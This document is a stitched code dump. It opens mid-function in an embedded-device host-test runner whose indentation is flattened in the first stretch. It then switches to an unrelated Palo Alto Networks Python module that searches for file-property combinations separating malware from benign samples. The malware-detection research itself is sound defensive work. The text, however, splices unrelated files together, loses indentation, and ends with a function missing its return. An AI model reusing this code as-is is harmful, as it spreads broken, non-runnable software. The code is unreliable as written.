self.logger.prn_err("orphan event in main phase: {{%s;%s}}, timestamp=%f"% (key, str(value), timestamp))
except Exception:
self.logger.prn_err("something went wrong in event main loop!")
self.logger.prn_inf("==== Traceback start ====")
for line in traceback.format_exc().splitlines():
print(line)
self.logger.prn_inf("==== Traceback end ====")
result = self.RESULT_ERROR
time_duration = time() - start_time
self.logger.prn_inf("test suite run finished after %.2f sec..."% time_duration)
if self.compare_log and result is None:
if self.compare_log_idx < len(self.compare_log):
self.logger.prn_err("Expected output [%s] not received in log." % self.compare_log[self.compare_log_idx])
# Force conn_proxy process to return
dut_event_queue.put(('__host_test_finished', True, time()))
p.join()
self.logger.prn_inf("CONN exited with code: %s"% str(p.exitcode))
# Callbacks...
self.logger.prn_inf("No events in queue" if event_queue.empty() else "Some events in queue")
# If host test was used we will:
# 1. Consume all existing events in queue if consume=True
# 2. Check result from host test and call teardown()
# NOTE: with the introduction of the '__exit_event_queue' event, there
# should never be left events assuming the DUT has stopped sending data
# over the serial data. Leaving this for now to catch anything that slips through.
if callbacks_consume:
# We are consuming all remaining events if requested
while not event_queue.empty():
try:
(key, value, timestamp) = event_queue.get(timeout=1)
except QueueEmpty:
break
if key == '__notify_complete':
# This event is sent by Host Test, test result is in value
# or if value is None, value will be retrieved from HostTest.result() method
self.logger.prn_inf("%s(%s)"% (key, str(value)))
result = value
elif key.startswith('__'):
# Consume other system level events
pass
elif key in callbacks:
callbacks[key](key, value, timestamp)
else:
self.logger.prn_wrn(">>> orphan event: {{%s;%s}}, timestamp=%f"% (key, str(value), timestamp))
self.logger.prn_inf("stopped consuming events")
if result is not None: # We must compare here against None!
# Here for example we've received some error code like IOERR_COPY
self.logger.prn_inf("host test result() call skipped, received: %s"% str(result))
else:
if self.test_supervisor:
result = self.test_supervisor.result()
self.logger.prn_inf("host test result(): %s"% str(result))
if not callbacks__exit:
self.logger.prn_wrn("missing __exit event from DUT")
if not callbacks__exit_event_queue:
self.logger.prn_wrn("missing __exit_event_queue event from host test")
#if not callbacks__exit_event_queue and not result:
if not callbacks__exit_event_queue and result is None:
self.logger.prn_err("missing __exit_event_queue event from " + \
"host test and no result from host test, timeout...")
result = self.RESULT_TIMEOUT
self.logger.prn_inf("calling blocking teardown()")
if self.test_supervisor:
self.test_supervisor.teardown()
self.logger.prn_inf("teardown() finished")
return result
def execute(self):
    """Run the full host-test flow and return the integer test result.

    Flashes the binary onto the target (unless --skip-flashing), then runs
    the host test via self.run_test() and maps its tri-state outcome onto a
    RESULT_* code, which is finally converted with get_test_result_int().

    @return integer result code, or -3 on keyboard interrupt
    """
    final_result = self.RESULT_UNDEF
    # Hello string with the htrun version, useful when debugging logs.
    self.logger.prn_inf(self.get_hello_string())
    try:
        if self.options.skip_flashing:
            self.logger.prn_inf("copy image onto target... SKIPPED!")
        else:
            self.logger.prn_inf("copy image onto target...")
            final_result = self.mbed.copy_image()
            if not final_result:
                # Flashing failed -- report the copy error immediately.
                final_result = self.RESULT_IOERR_COPY
                return self.get_test_result_int(final_result)
        # Execute test if flashing was successful or skipped.
        outcome = self.run_test()
        # Map True/False/None onto result codes; any other value (e.g. a
        # RESULT_* string from run_test) is passed through unchanged.
        if outcome == True:
            final_result = self.RESULT_SUCCESS
        elif outcome == False:
            final_result = self.RESULT_FAILURE
        elif outcome is None:
            final_result = self.RESULT_ERROR
        else:
            final_result = outcome
        # This line is captured by Greentea.
        self.logger.prn_inf("{{result;%s}}" % final_result)
        return self.get_test_result_int(final_result)
    except KeyboardInterrupt:
        return -3  # Keyboard interrupt
def match_log(self, line):
    """Advance the compare-log cursor when *line* matches the next entry.

    Entries of self.compare_log are matched strictly in sequence using
    self.compare_log_idx. Each entry is tried first as a plain substring
    and, failing that, as a regular expression.

    :param line: one line of target serial output
    :return: True once every compare-log entry has been matched
    """
    if self.compare_log_idx < len(self.compare_log):
        pattern = self.compare_log[self.compare_log_idx]
        try:
            # Substring check first; only fall back to a regex search.
            hit = pattern in line or re.search(pattern, line)
        except error:
            # Entry is not a valid regular expression (and was not a substring).
            return False
        if hit:
            self.compare_log_idx += 1
    return self.compare_log_idx == len(self.compare_log)
|
combo_generator.py | """
@author: Min Du (midu@paloaltonetworks.com)
Copyright (c) 2021 Palo Alto Networks
"""
import os
import csv
import time
import math
import random
import logging
import multiprocessing
import numpy as np
from utils import misc
from utils import const
from utils.config_parser import CommonConfig
class ComboGenerator:
    """Enumerates property combinations (combos) that match many label-1
    samples while matching at most a few label-0 samples."""

    # Smallest batch each worker process is worth spawning for.
    MIN_COMBOS_PER_PROCESS = 2
    # NUM_PROCESS = multiprocessing.cpu_count()

    class ComboEvalResult:
        """Tri-state verdict for one evaluated candidate combo."""
        TO_EXPEND = 0  # keep growing this candidate
        IS_COMBO = 1   # accepted as a generated combo
        TO_PRUNE = 2   # discarded, and is not a combo
def __init__(self):
    """Read generation-mode configuration and initialize all bookkeeping state."""
    self.logger = logging.getLogger(misc.get_logger_name(__name__))
    self.logger.info('Current logging level: %s', self.logger.getEffectiveLevel())
    # Property vocabulary {property: bit index} and the evaluation order.
    self.property_index_mapping = {}
    self.sorted_properties = []
    # Label-1 ("hit more") / label-0 ("hit less") samples as bitmask integers,
    # plus the match-count thresholds a combo must satisfy.
    self.integers_to_hit_more = {}
    self.min_threshold = -1
    self.integers_to_hit_less = {}
    self.max_threshold = -1
    self.min_combo_size = -1
    self.max_combo_size = -1
    # Per-length sets of already-pruned candidates (integer form).
    self.pruned_cand_ints = {}
    # Running union of hashes hit by any generated combo so far.
    self.hit_hashes_to_hit_more = set()
    self.hit_hashes_to_hit_less = set()
    self.start_time = 0
    # Ablation variant: raw property sets instead of bitmask integers.
    self.properties_to_hit_more = {}
    self.properties_to_hit_less = {}
    self.pruned_cand_properties = {}
    # {combo: [sha256, ...], ...}
    self.hashes_to_hit_more_by_combo = {}
    self.hashes_to_hit_less_by_combo = {}
    # {comboA: comboB, ...}, ...} meaning that comboA is expanded from comboB,
    self.parent_combo = {}
    # {combo: cnt} means how many child combos are being checked that are expanded from this combo
    # when 'ref_cnt' is 0 we can delete its hashes in self.hashes_to_hit_**_by_combo to save memory.
    self.combo_ref_cnt = {}
    # ablation study and optimizations
    self.generation_mode = CommonConfig.get_generation_mode()
    self.do_property_sorting = False
    self.use_integer_subset = False
    self.use_multi_processing = False
    self.record_parent_hashes = False
    self.NUM_PROCESS = 1
    if self.generation_mode == 'ablation_study':
        self.do_property_sorting = CommonConfig.get_do_property_sorting()
        self.use_integer_subset = CommonConfig.get_use_integer_subset()
    else:
        # All non-ablation modes keep both optimizations on.
        self.do_property_sorting = True
        self.use_integer_subset = True
        if self.generation_mode == 'multi_processing':
            self.use_multi_processing = True
            self.NUM_PROCESS = CommonConfig.get_num_cores()
        elif self.generation_mode == 'store_parent_hits':
            self.record_parent_hashes = True
        else:
            # NOTE(review): unknown mode only warns on stdout (not the logger)
            # and then proceeds with plain defaults -- confirm this is intended.
            print(f'Generation mode {self.generation_mode} unknown, please check config file.')
    self.hit_hash_folder = const.get_generated_combo_hit_hashes_folder()
def generate_combos(self):
    """Enumerate and persist property combos.

    Walks self.sorted_properties one property at a time. For each new
    property it grows candidate combos (bounded by max_combo_size),
    evaluates them against the label-1 / label-0 sample sets, prunes
    hopeless candidates, and writes every accepted combo as one CSV row of
    the generated-combo file (plus per-combo hit-hash dump files).

    @return list of human-readable summary lines
    """
    summary_to_return = ['Summary: ']
    generated_combo_file = const.get_generated_combo_file()
    self.logger.info(f'Starting to generate combo file {generated_combo_file}')
    summary_to_return.append(f'Generated combos are in file {generated_combo_file}')
    # get all related configurations
    self.min_combo_size = CommonConfig.get_min_combo_size()
    self.max_combo_size = CommonConfig.get_max_combo_size()
    self.property_index_mapping = misc.get_property_index_mapping()
    with open(const.get_all_sorted_property_file()) as fh:
        all_lines = fh.readlines()
    property_file_header, property_file_lines = all_lines[0], all_lines[1:]
    if self.do_property_sorting:
        # Properties are already ranked in the input file; keep that order.
        for ln in property_file_lines:
            self.sorted_properties.append(ln.strip().split(',')[0])
    else:
        # Ablation: use (and cache on disk) a reproducibly shuffled order.
        not_sorted_property_file = const.get_not_sorted_property_file()
        if not os.path.exists(not_sorted_property_file):
            random.seed(CommonConfig.get_random_seed())
            random.shuffle(property_file_lines)
            with open(not_sorted_property_file, 'w') as fh_not:
                fh_not.write(property_file_header)
                for ln in property_file_lines:
                    fh_not.write(ln)
        with open(not_sorted_property_file) as fh_not:
            for ln in fh_not.readlines()[1:]:
                self.sorted_properties.append(ln.strip().split(',')[0])
    if not self.do_property_sorting:
        # NOTE(review): a second shuffle with a hard-coded seed of 4 on top of
        # the cached shuffled file above -- presumably intentional for
        # reproducibility; confirm.
        random.seed(4)
        random.shuffle(self.sorted_properties)
    start_date, end_date = misc.get_start_end_date_for_combo_generation()
    if self.use_integer_subset:
        # Bitmask representation: one integer per sample hash.
        self.integers_to_hit_more = misc.load_property_integers(gt_labels=[1],
                                                                start_date=start_date, end_date=end_date)
        self.integers_to_hit_less = misc.load_property_integers(gt_labels=[0],
                                                                start_date=start_date, end_date=end_date)
    else:
        # Ablation: raw property sets per sample hash.
        self.properties_to_hit_more = misc.load_property_sets(gt_labels=[1],
                                                              start_date=start_date, end_date=end_date)
        self.properties_to_hit_less = misc.load_property_sets(gt_labels=[0],
                                                              start_date=start_date, end_date=end_date)
    self.logger.info(f'Finished integer loading. '
                     f'Statistics: #integers_to_hit_more: {len(self.integers_to_hit_more)}; '
                     f'#integers_to_hit_less: {len(self.integers_to_hit_less)};')
    if self.record_parent_hashes:
        # 'root' acts as the virtual parent of every single-property candidate.
        self.hashes_to_hit_more_by_combo['root'] = list(self.integers_to_hit_more.keys())
        self.hashes_to_hit_less_by_combo['root'] = list(self.integers_to_hit_less.keys())
        self.combo_ref_cnt['root'] = 0
    self.min_threshold = const.get_min_threshold()
    self.max_threshold = const.get_max_threshold()
    self.logger.info(f'Start combo generation, min match threshold: {self.min_threshold}; '
                     f'max match threshold: {self.max_threshold}.')
    for i in range(1, self.max_combo_size+1):
        # also need to add the ones with self.max_combo_size into pruned_set, in case duplicates are generated
        self.pruned_cand_ints[i] = set()
        self.pruned_cand_properties[i] = []
    # enumerate combos and generate
    with open(generated_combo_file, 'w') as cfp:
        csv_writer = csv.writer(cfp, delimiter=',')
        header = ['candidates', 'all-malware', 'all-benign',
                  'malware-this-hit-ratio', 'benign-this-hit-ratio', 'malware-this-hit-cnt',
                  'benign-this-hit-cnt', 'malware-total-ratio-so-far', 'benign-total-ratio-so-far',
                  'malware-total-cnt-so-far', 'benign-total-cnt-so-far', 'time-elapsed']
        csv_writer.writerow(header)
        self.start_time = time.time()
        properties_previous_step = []  # properties fully processed in earlier iterations
        for new_property in self.sorted_properties:
            self.logger.info('Adding new property %s', new_property)
            if self.record_parent_hashes:
                self.parent_combo[new_property] = 'root'
                self.combo_ref_cnt['root'] += 1
                self.logger.debug(f'record_hashes_to_check_per_combo, adding new property {new_property},'
                                  f'combo_ref_cnt: {self.combo_ref_cnt}')
            # Putting new_property first guarantees every candidate in this
            # iteration contains it, so earlier iterations are not repeated.
            property_list = [new_property] + properties_previous_step
            candidates = [[b] for b in property_list]
            property_id_mapping = dict((f, i) for i, f in enumerate(property_list))
            while len(candidates) > 0:
                new_candidates_potential = []
                candidates_to_eval = []
                for combo_candidate in candidates:
                    # Once the first element is an already-processed property,
                    # the remaining (ordered) candidates are duplicates of
                    # earlier iterations -- skip them wholesale.
                    if combo_candidate[0] in properties_previous_step:
                        break
                    candidates_to_eval.append(combo_candidate)
                self.logger.info(f'--Time elapsed: {time.time()-self.start_time}, '
                                 f'#combos to evaluate next: {len(candidates_to_eval)}')
                if len(candidates_to_eval) == 0:
                    break
                if self.use_multi_processing:
                    start_time = time.time()
                    result_array = self.multi_processing(self.check_one_candidate, candidates_to_eval)
                    self.logger.debug(f'++Time taken to eval each combo: '
                                      f'{(time.time()-start_time) / len(candidates_to_eval)}, '
                                      f'One round of evaluation done. Evaluated candidates: {candidates_to_eval}')
                    new_candidates_potential += \
                        self.handle_eval_results(candidates_to_eval, result_array, property_id_mapping,
                                                 property_list, csv_writer, cfp)
                    # The pruning check is fanned out to worker processes too.
                    result_array = self.multi_processing(self.check_candidate_validity, new_candidates_potential)
                    candidates = []
                    for idx, nc in enumerate(new_candidates_potential):
                        if result_array[idx] > 0:
                            candidates.append(nc)
                else:
                    for cc in candidates_to_eval:
                        eval_result = self.check_one_candidate_single_process(cc)
                        self.logger.debug(f'cc: {cc}, eval_result: {eval_result}')
                        new_candidates_potential += \
                            self.handle_eval_results([cc], [eval_result], property_id_mapping, property_list,
                                                     csv_writer, cfp)
                    candidates = []
                    for nc in new_candidates_potential:
                        if not self.is_pruned(nc):
                            candidates.append(nc)
                            if self.record_parent_hashes:
                                # Keep the parent's cached hashes alive while
                                # this child is awaiting evaluation.
                                self.combo_ref_cnt[self.parent_combo['-'.join(sorted(nc))]] += 1
            if not self.is_pruned([new_property]):
                properties_previous_step.append(new_property)
    return summary_to_return
def multi_processing(self, func, candidates_to_handle):
    """Fan *func* out over worker processes, one contiguous slice each.

    @param func worker callable taking (candidates, result_array, idx_range)
                and writing its verdicts into result_array at idx_range
    @param candidates_to_handle list of candidate combos to process
    @return shared integer array of per-candidate results (empty list when
            there was nothing to process)
    """
    result_array = []
    if len(candidates_to_handle) > 0:
        processes = []
        # Shared ctypes int array; the initial 0..n-1 values are placeholders
        # that workers overwrite at their assigned indices.
        result_array = multiprocessing.Array('i', range(len(candidates_to_handle)))
        num_candidates_per_process = self.get_num_candidates_per_process(len(candidates_to_handle))
        candidates_to_handle = np.asarray(candidates_to_handle)
        for idx in range(0, len(candidates_to_handle), num_candidates_per_process):
            idx_range = [x for x in
                         range(idx, min(len(candidates_to_handle), idx + num_candidates_per_process))]
            # NOTE(review): shuffling within the slice only reorders work inside
            # one process; results still land at their own indices.
            random.shuffle(idx_range)
            new_candidates = candidates_to_handle[idx_range]
            p = multiprocessing.Process(target=func, args=(new_candidates, result_array, idx_range))
            processes.append(p)
            p.start()
        for process in processes:
            process.join()
    return result_array
def get_num_candidates_per_process(self, num_candidates_to_handle):
    """Return the batch size each worker process should receive.

    Caps the process count at NUM_PROCESS while guaranteeing at least
    MIN_COMBOS_PER_PROCESS candidates per process (and at least 1 process).

    @param num_candidates_to_handle total number of candidates to split
    @return number of candidates per worker process
    """
    max_useful_processes = math.ceil(num_candidates_to_handle / self.MIN_COMBOS_PER_PROCESS)
    num_processes = max(min(self.NUM_PROCESS, max_useful_processes), 1)
    num_candidates_per_process = math.ceil(num_candidates_to_handle / num_processes)
    self.logger.info(f'#processes: {num_processes}, #candidates per process: {num_candidates_per_process}')
    return num_candidates_per_process
def check_candidate_validity(self, candidates, result_array, idx_range):
    """Worker: flag each candidate as valid (1) or pruned (0).

    @param candidates candidate combos assigned to this worker
    @param result_array shared int array to write verdicts into
    @param idx_range result_array index for each candidate, same order
    """
    for pos, candidate in enumerate(candidates):
        slot = idx_range[pos]
        result_array[slot] = 0 if self.is_pruned(candidate) else 1
def handle_eval_results(self, candidates, result_array, property_id_mapping, property_list, csv_writer, cfp):
    """Act on the evaluation verdict of each candidate combo.

    TO_EXPEND candidates are grown into longer candidates. IS_COMBO
    candidates are recorded (one CSV row plus .tp/.fp hit-hash dump files)
    and added to the pruned sets so their supersets are never regenerated.
    TO_PRUNE candidates are only added to the pruned sets.

    @param candidates list of candidate combos just evaluated
    @param result_array per-candidate ComboEvalResult verdicts (same order)
    @param property_id_mapping {property: position} within property_list
    @param property_list evaluation-ordered properties of this iteration
    @param csv_writer csv.writer over the generated-combo file
    @param cfp open file handle behind csv_writer (flushed per combo)
    @return list of longer candidates to evaluate next
    """
    new_candidates_potential = []
    for idx, combo in enumerate(candidates):
        state = result_array[idx]
        if state == self.ComboEvalResult.TO_EXPEND:
            self.logger.debug(f'Expanding {combo}.')
            if len(combo) < self.max_combo_size:
                candidates_to_check = self.get_new_candidates(combo, property_id_mapping=property_id_mapping,
                                                              property_list=property_list)
                new_candidates_potential += candidates_to_check
        elif state == self.ComboEvalResult.IS_COMBO:
            self.logger.info(f'generated combo {combo}')
            tp_hit_hashes, fp_hit_hashes = set(), set()
            if self.use_integer_subset:
                full_int = self._get_integer(combo)
                # Register the found combo as "pruned" so supersets are skipped.
                self.pruned_cand_ints[len(combo)].add(full_int)
                # count unique malware hit now
                if not self.record_parent_hashes:
                    tp_hit_hashes = \
                        self.get_hit_hashes(full_int, self.integers_to_hit_more,
                                            hit_hashes_already=self.hit_hashes_to_hit_more)
                    fp_hit_hashes = \
                        self.get_hit_hashes(full_int, self.integers_to_hit_less,
                                            hit_hashes_already=self.hit_hashes_to_hit_less)
                    this_hit_cnt_to_hit_more = len(tp_hit_hashes)
                    this_hit_cnt_to_hit_less = len(fp_hit_hashes)
                else:
                    # store_parent_hits mode: only re-scan the hashes the parent
                    # combo still hits, then release the parent's cache.
                    parent_combo = self.parent_combo['-'.join(sorted(combo))]
                    self.logger.debug(f'record_hashes_to_check_per_combo, generated new combo {combo}, '
                                      f'its parent combo is {parent_combo}, '
                                      f'#hashes_to_hit_more: {len(self.hashes_to_hit_more_by_combo[parent_combo])}, '
                                      f'#hashes_to_hit_less: {len(self.hashes_to_hit_less_by_combo[parent_combo])}')
                    tp_hit_hashes = \
                        self.get_hit_hashes(full_int, self.integers_to_hit_more,
                                            hit_hashes_already=self.hit_hashes_to_hit_more,
                                            hashes_to_check_by_combo=self.hashes_to_hit_more_by_combo[parent_combo])
                    fp_hit_hashes = \
                        self.get_hit_hashes(full_int, self.integers_to_hit_less,
                                            hit_hashes_already=self.hit_hashes_to_hit_less,
                                            hashes_to_check_by_combo=self.hashes_to_hit_less_by_combo[parent_combo])
                    this_hit_cnt_to_hit_more = len(tp_hit_hashes)
                    this_hit_cnt_to_hit_less = len(fp_hit_hashes)
                    self.check_and_cleanup_hashes_by_combo(combo)
                self.logger.debug(f'this_hit_cnt_to_hit_more: {this_hit_cnt_to_hit_more}, '
                                  f'this_hit_cnt_to_hit_less: {this_hit_cnt_to_hit_less}')
                total_cnt_to_hit_more = len(self.integers_to_hit_more)
                total_cnt_to_hit_less = len(self.integers_to_hit_less)
            else:
                # Ablation path: property-set representation.
                combo = set(combo)
                self.pruned_cand_properties[len(combo)].append(combo)
                tp_hit_hashes = self.get_hit_hashes_by_properties(combo, self.properties_to_hit_more,
                                                                 self.hit_hashes_to_hit_more)
                fp_hit_hashes = self.get_hit_hashes_by_properties(combo, self.properties_to_hit_less,
                                                                 self.hit_hashes_to_hit_less)
                this_hit_cnt_to_hit_more = len(tp_hit_hashes)
                this_hit_cnt_to_hit_less = len(fp_hit_hashes)
                total_cnt_to_hit_more = len(self.properties_to_hit_more)
                total_cnt_to_hit_less = len(self.properties_to_hit_less)
            # Dump the exact hashes this combo hits (.tp = label-1, .fp = label-0).
            with open(os.path.join(self.hit_hash_folder, f'{"-".join(sorted(combo))}.tp'), 'w') as fh:
                for hh in tp_hit_hashes:
                    fh.write(f'{hh}\n')
            with open(os.path.join(self.hit_hash_folder, f'{"-".join(sorted(combo))}.fp'), 'w') as fh:
                for hh in fp_hit_hashes:
                    fh.write(f'{hh}\n')
            sofar_hit_cnt_to_hit_more = len(self.hit_hashes_to_hit_more)
            sofar_hit_cnt_to_hit_less = len(self.hit_hashes_to_hit_less)
            one_row = ['-'.join(sorted(combo)), total_cnt_to_hit_more, total_cnt_to_hit_less,
                       f'{this_hit_cnt_to_hit_more * 100 / total_cnt_to_hit_more}',
                       f'{this_hit_cnt_to_hit_less * 100 / total_cnt_to_hit_less}',
                       this_hit_cnt_to_hit_more, this_hit_cnt_to_hit_less,
                       f'{sofar_hit_cnt_to_hit_more * 100 / total_cnt_to_hit_more: .3f}',
                       f'{sofar_hit_cnt_to_hit_less * 100 / total_cnt_to_hit_less: .3f}',
                       f'{sofar_hit_cnt_to_hit_more}', f'{sofar_hit_cnt_to_hit_less}',
                       f'{time.time() - self.start_time: .3f}']
            csv_writer.writerow(one_row)
            cfp.flush()
        else:
            # TO_PRUNE: remember it so any superset candidate is skipped later.
            self.logger.info(f'Combo {combo} did not hit enough hashes_to_hit_more, add it to prune list')
            if self.use_integer_subset:
                full_int = self._get_integer(combo)
                self.pruned_cand_ints[len(combo)].add(full_int)
                if self.record_parent_hashes:
                    self.logger.debug(f'record_hashes_to_check_per_combo, pruning combo {combo}')
                    self.check_and_cleanup_hashes_by_combo(combo)
            else:
                self.pruned_cand_properties[len(combo)].append(set(combo))
    return new_candidates_potential
def check_and_cleanup_hashes_by_combo(self, child_combo):
    """Release one reference on the child's parent; free memory when done.

    Drops the child's parent link, decrements the parent's ref count, and
    deletes the parent's cached hit-hash lists once no child references it
    anymore (the virtual 'root' entry is never deleted).

    @param child_combo combo (list of property names) that finished checking
    """
    child_key = '-'.join(sorted(child_combo))
    parent = self.parent_combo[child_key]
    self.logger.debug(f'record_hashes_to_check_per_combo, to cleanup for combo {child_combo}, '
                      f'its parent combo is {parent}, '
                      f'self.combo_ref_cnt[parent_combo]: {self.combo_ref_cnt[parent]}')
    self.combo_ref_cnt[parent] -= 1
    del self.parent_combo[child_key]
    if self.combo_ref_cnt[parent] == 0 and parent != 'root':
        del self.hashes_to_hit_more_by_combo[parent]
        del self.hashes_to_hit_less_by_combo[parent]
        self.logger.debug(f'record_hashes_to_check_per_combo, deleted hashes for combo {parent}')
def check_one_candidate(self, combo_candidate, eval_result, idx_range):
    """Worker: classify each candidate combo and record the verdict.

    A candidate that hits more than min_threshold-1 label-1 samples is a
    combo; if it additionally hits more than max_threshold label-0 samples
    it must keep growing (TO_EXPEND). Otherwise it is pruned.

    @param combo_candidate candidate combos assigned to this worker
    @param eval_result shared int array to write ComboEvalResult values into
    @param idx_range eval_result index for each candidate, same order
    """
    for pos, cand in enumerate(combo_candidate):
        slot = idx_range[pos]
        cand_int = self._get_integer(cand)
        if not self.hit_many(cand_int, self.integers_to_hit_more, self.min_threshold - 1):
            eval_result[slot] = self.ComboEvalResult.TO_PRUNE
        elif self.hit_many(cand_int, self.integers_to_hit_less, self.max_threshold):
            eval_result[slot] = self.ComboEvalResult.TO_EXPEND
        else:
            # Enough label-1 hits and few enough label-0 hits: a combo.
            eval_result[slot] = self.ComboEvalResult.IS_COMBO
def check_one_candidate_single_process(self, cc):
    """Classify one candidate combo in the current process.

    @param cc candidate combo (list of property names)
    @return a ComboEvalResult constant: TO_EXPEND (enough label-1 hits AND
            still too many label-0 hits), IS_COMBO (enough label-1, few
            enough label-0) or TO_PRUNE (too few label-1 hits)
    """
    if self.use_integer_subset:
        full_int = self._get_integer(cc)
        if not self.record_parent_hashes:
            if self.hit_many(full_int, self.integers_to_hit_more, self.min_threshold-1):
                if self.hit_many(full_int, self.integers_to_hit_less, self.max_threshold):
                    return self.ComboEvalResult.TO_EXPEND
                else:  # generated one
                    return self.ComboEvalResult.IS_COMBO
            else:
                return self.ComboEvalResult.TO_PRUNE
        else:
            # store_parent_hits mode: only re-check the hashes the parent combo
            # hit, and cache this combo's own hits for its future children.
            combo_str = '-'.join(sorted(cc))
            hashes_to_hit_more = self.get_hit_hashes(full_int, self.integers_to_hit_more,
                                                     self.hashes_to_hit_more_by_combo[self.parent_combo[combo_str]])
            if len(hashes_to_hit_more) > self.min_threshold-1:
                hashes_to_hit_less = self.get_hit_hashes(full_int, self.integers_to_hit_less,
                                                         self.hashes_to_hit_less_by_combo[self.parent_combo[combo_str]])
                if len(hashes_to_hit_less) > self.max_threshold:
                    self.hashes_to_hit_more_by_combo[combo_str] = hashes_to_hit_more
                    self.hashes_to_hit_less_by_combo[combo_str] = hashes_to_hit_less
                    self.combo_ref_cnt[combo_str] = 0
                    self.logger.debug(f'record_hashes_to_check_per_combo, generated hit_hashes for combo {cc}, '
                                      f'#hashes_to_hit_more_by_combo[combo]: '
                                      f'{len(self.hashes_to_hit_more_by_combo[combo_str])}, '
                                      f'#hashes_to_hit_less_by_combo[combo]: '
                                      f'{len(self.hashes_to_hit_less_by_combo[combo_str])}')
                    return self.ComboEvalResult.TO_EXPEND
                else:  # generated one
                    return self.ComboEvalResult.IS_COMBO
            else:
                return self.ComboEvalResult.TO_PRUNE
    else:
        cc = set(cc)
        if not self.record_parent_hashes:
            if self.hit_many_by_properties(cc, self.properties_to_hit_more, self.min_threshold-1):
                if self.hit_many_by_properties(cc, self.properties_to_hit_less, self.max_threshold):
                    return self.ComboEvalResult.TO_EXPEND
                else:  # generated one
                    return self.ComboEvalResult.IS_COMBO
            else:
                return self.ComboEvalResult.TO_PRUNE
        # NOTE(review): with record_parent_hashes set AND the property-set
        # (non-integer) representation, control falls through and implicitly
        # returns None -- presumably this mode combination is never configured;
        # confirm against config_parser.
def hit_many(self, this_int, all_ints_to_check, max_cnt, hashes_to_check_by_combo=None):
    """Return True once strictly more than *max_cnt* samples contain this_int.

    Short-circuits as soon as the threshold is exceeded.

    @param this_int candidate combo as a bitmask integer
    @param all_ints_to_check {sha256: bitmask} samples to scan
    @param max_cnt hit-count threshold (exclusive)
    @param hashes_to_check_by_combo optional subset of sha256 keys to scan
    @return True when hits > max_cnt, otherwise False
    """
    keys = hashes_to_check_by_combo if hashes_to_check_by_combo is not None \
        else list(all_ints_to_check.keys())
    hits = 0
    for sha256 in keys:
        if self.first_in_second(this_int, all_ints_to_check[sha256]):
            hits += 1
            if hits > max_cnt:
                return True
    return False
def hit_many_by_properties(self, property_set_to_check, all_property_sets_to_check, max_cnt):
    """Return True once strictly more than *max_cnt* samples contain the combo.

    Property-set counterpart of hit_many(); short-circuits on threshold.

    @param property_set_to_check candidate combo as a set of properties
    @param all_property_sets_to_check {sha256: property_set} samples to scan
    @param max_cnt hit-count threshold (exclusive)
    @return True when hits > max_cnt, otherwise False
    """
    hits = 0
    # The sample hashes themselves are not needed here, only their sets.
    for property_set in all_property_sets_to_check.values():
        if self.first_in_second_properties(property_set_to_check, property_set):
            hits += 1
            if hits > max_cnt:
                return True
    return False
def get_hit_hashes(self, full_int, all_ints_to_check, hashes_to_check_by_combo=None, hit_hashes_already=None):
    """Collect the sha256 hashes of samples whose bitmask contains full_int.

    @param full_int candidate combo as a bitmask integer
    @param all_ints_to_check {sha256: bitmask} samples to scan
    @param hashes_to_check_by_combo optional subset of sha256 keys to scan
    @param hit_hashes_already optional running set; matches are added to it
    @return set of sha256 hashes hit by this combo
    """
    if hashes_to_check_by_combo is None:
        hashes_to_check_by_combo = list(all_ints_to_check.keys())
    self.logger.debug(f'len(hashes_to_check_by_combo): {len(hashes_to_check_by_combo)}')
    hit_hashes = {sha256 for sha256 in hashes_to_check_by_combo
                  if self.first_in_second(full_int, all_ints_to_check[sha256])}
    if hit_hashes_already is not None:
        hit_hashes_already.update(hit_hashes)
    return hit_hashes
def get_hit_hashes_by_properties(self, property_set_to_check, all_property_sets_to_check, hit_hashes_already):
    """Collect the sha256 hashes of samples whose property set contains the combo.

    Property-set counterpart of get_hit_hashes(). Matches are also added to
    *hit_hashes_already*, the running union across all generated combos.

    Fixed: removed the dead local hit counter the original incremented but
    never read (its value was always len(hit_hashes)).

    @param property_set_to_check candidate combo as a set of properties
    @param all_property_sets_to_check {sha256: property_set} samples to scan
    @param hit_hashes_already running set of hit hashes (mutated in place)
    @return set of sha256 hashes hit by this combo
    """
    hit_hashes = set()
    for sha256, property_set in all_property_sets_to_check.items():
        if self.first_in_second_properties(property_set_to_check, property_set):
            hit_hashes.add(sha256)
            hit_hashes_already.add(sha256)
    return hit_hashes
def get_new_candidates(self, combo, property_id_mapping, property_list):
    """Expand *combo* by each property that follows its last element.

    Only properties after the last element's position in *property_list*
    are appended, which keeps the enumeration canonical (no duplicate
    candidates in different orders). In store_parent_hits mode the new
    candidates are also linked back to *combo* in self.parent_combo.

    Fixed: renamed the loop variable, which shadowed the builtin `property`.

    @param combo candidate combo to expand (list of property names)
    @param property_id_mapping {property: position} within property_list
    @param property_list evaluation-ordered properties of this iteration
    @return list of one-longer candidate combos
    """
    last_id = property_id_mapping[combo[-1]]
    new_candidates = []
    for prop in property_list[last_id + 1:]:
        candidate = list(combo) + [prop]
        if self.record_parent_hashes:
            self.parent_combo['-'.join(sorted(candidate))] = '-'.join(sorted(combo))
        new_candidates.append(candidate)
    return new_candidates
def is_pruned(self, new_candidate):
    """Return True if new_candidate is a superset of any previously pruned combo.

    A candidate that contains an already-pruned combination can never succeed,
    so the search tree is cut here.

    Args:
        new_candidate: list of property names forming the candidate combo.

    Returns:
        True when a pruned combo (integer or property-set form, depending on
        self.use_integer_subset) is contained in new_candidate.
    """
    if self.use_integer_subset:
        new_int = self._get_integer(new_candidate)
        for length, ints in self.pruned_cand_ints.items():
            # A pruned combo longer than the candidate cannot be contained in it.
            if length > len(new_candidate):
                continue
            # Fixed: use the value already yielded by items() instead of the
            # redundant self.pruned_cand_ints[length] re-lookup.
            for candidate_int in ints:
                if self.first_in_second(candidate_int, new_int):
                    return True
        return False
    for length, property_set_lists in self.pruned_cand_properties.items():
        if length > len(new_candidate):
            continue
        for property_set in property_set_lists:
            if self.first_in_second_properties(property_set, new_candidate):
                self.logger.debug(f'Prune combo {new_candidate} '
                                  f'because it is a superset of previous pruned combo {property_set}')
                return True
    return False
def first_in_second(self, first_int, second_int):
    """Return True when every set bit of first_int is also set in second_int."""
    # first ⊆ second  <=>  first has no bits outside second.
    return (first_int & ~second_int) == 0
def first_in_second_properties(self, first_set, second_set):
    """Return True when every element of first_set occurs in second_set.

    second_set may be any iterable of hashables (callers pass both sets and
    lists); it is materialized into a set for the comparison, exactly as
    set.issubset does internally.
    """
    return first_set <= set(second_set)
def _get_integer(self, properties):
ret = 0
for b in properties:
if b not in self.property_index_mapping:
return -1
ret |= 1 << self.property_index_mapping[b]
